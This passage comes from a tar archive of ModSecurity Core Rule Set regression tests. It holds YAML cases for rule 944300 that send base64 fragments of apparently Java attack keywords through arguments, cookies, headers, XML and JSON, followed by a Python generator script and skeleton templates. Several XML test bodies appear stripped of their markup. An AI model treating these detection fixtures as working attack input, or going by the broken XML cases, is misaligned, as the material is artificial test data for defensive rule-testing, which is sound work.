HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-315 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-316 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-317 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-318 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-319 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-320 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU=test" output: log_contains: "id \"944300\"" - test_title: 944300-321 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=B3aGlsZWNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-322 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: B3aGlsZWNsb3N1cmU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-323 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: B3aGlsZWNsb3N1cmU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-324 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-325 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-326 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "B3aGlsZWNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-327 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=B3aGlsZWNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-328 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" output: log_contains: "id \"944300\"" - test_title: 944300-329 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" output: log_contains: "id \"944300\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/base_positive_rules.py���������������������������������0000775�0000000�0000000�00000010424�14461225151�0025767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python #@spartantri 2018 import sys import argparse import base64 parser = argparse.ArgumentParser() UserAgent="ModSecurity CRS 3 Tests" Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7" AcceptEncoding="gzip,deflate" AcceptLanguage="en-us,en;q=0.5" ContentType="application/x-www-form-urlencoded" payloads=[] skeletontest=0 Meta='''--- meta: author: "spartantri" enabled: true name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' parser.add_argument('-a', action='store', dest='Addr', help='Target ip address', default='127.0.0.1') parser.add_argument('-p', action='store', dest='Port', help='Target port', default='80') parser.add_argument('-v', action='store', dest='Host', help='Target virtual host', default='localhost') parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file', default='positivetest.yaml.skeleton') parser.add_argument('-o', action='store', dest='output', help='output file', default='') parser.add_argument('-r', action='store', dest='ruleid', help='Rule id', default='944310') parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads', default='') parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload', default=[]) parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads', default='') parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads', default='') parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64', default=False) parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided', default=False) parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output', default=False) parser.add_argument('-w', action='store', dest='author', help='Test author', default='spartantri') start_options = parser.parse_args() if len(sys.argv)<2 and not start_options.demo: parser.print_usage() exit() for p in start_options.combined_payload.split('|'): if p not in payloads: # print('Checking %s' % (p)) if len(p)>0: payloads.append(''.join([start_options.prefix, p, start_options.sufix])) for p in start_options.list_payload: payloads.append(''.join([start_options.prefix, p, start_options.sufix])) if start_options.output=='': o=sys.stdout else: o=open(start_options.output, 'w') o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author)) for item in payloads: if start_options.base64encode: payload=base64.encodestring(item).replace('\n', '') #print payload else: payload=item with open(start_options.skeleton,'r') as f: for l in f: l=l.replace('skeletonid', start_options.ruleid) l=l.replace('skeletonkeyword', payload) l=l.replace('skeletondefaultaddr', start_options.Addr) l=l.replace('skeletondefaultport', start_options.Port) l=l.replace('skeletondefaulthost', start_options.Host) l=l.replace('skeletondefaultuseragent', UserAgent) l=l.replace('skeletondefaultacceptcharset', AcceptCharset) l=l.replace('skeletondefaultacceptencoding', AcceptEncoding) l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage) l=l.replace('skeletondefaultcontenttype', ContentType) l=l.replace('skeletondefaultaccept', Accept) if 'skeletontest' in l: l=l.replace('skeletontest', str(skeletontest)) skeletontest+=1 o.write(l) if start_options.output != '': print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) o.close() #print('\nGenerated %s tests' % (str(skeletontest))) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/positivetest-light.yaml.skeleton�����������������������0000664�0000000�0000000�00000023106�14461225151�0027723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ - test_title: skeletonid-skeletontest desc: "Argument test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Argument name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword=test" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: test=skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Request header test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" test: skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Nested XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"skeletonkeyword\": \"test\"}" output: log_contains: "id \"skeletonid\"" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/positivetest.yaml.skeleton�����������������������������0000664�0000000�0000000�00000037605�14461225151�0026627�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ - test_title: skeletonid-skeletontest desc: "Argument test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Argument name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword=test" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: test=skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Request header test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" test: skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Nested XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"skeletonkeyword\": \"test\"}" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--" output: log_contains: "id 